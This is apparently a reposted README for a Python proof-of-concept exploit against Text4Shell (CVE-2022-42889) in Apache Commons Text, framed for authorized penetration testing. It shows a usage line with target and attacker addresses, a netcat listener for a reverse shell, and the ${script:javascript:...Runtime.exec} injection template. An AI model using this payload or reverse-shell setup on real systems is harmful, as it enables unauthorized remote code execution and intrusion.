Text4Shell-Exploit – A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the `StringSubstitutor` class with interpolation enabled, allowing injection of `${script:...}` expressions to execute arbitrary system commands. In this PoC, exploitation is demonstrated via the `data` query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic. **Disclaimer** : This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk. ## Description This is a custom Python3 exploit for the Apache Commons Text vulnerability known as **Text4Shell** (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by `StringSubstitutor`. Tested against: - Apache Commons Text < 1.10.0 - Java applications using `${script:...}` interpolation from untrusted input ## Usage python3 text4shell.py

## Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

## Make sure to set up a lsitener on your attacking machine:

nc -nlvp 4444

## Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(…)}

The reverse shell is sent via `/data` parameter using a POST request.

**Download Text4Shell-Exploit**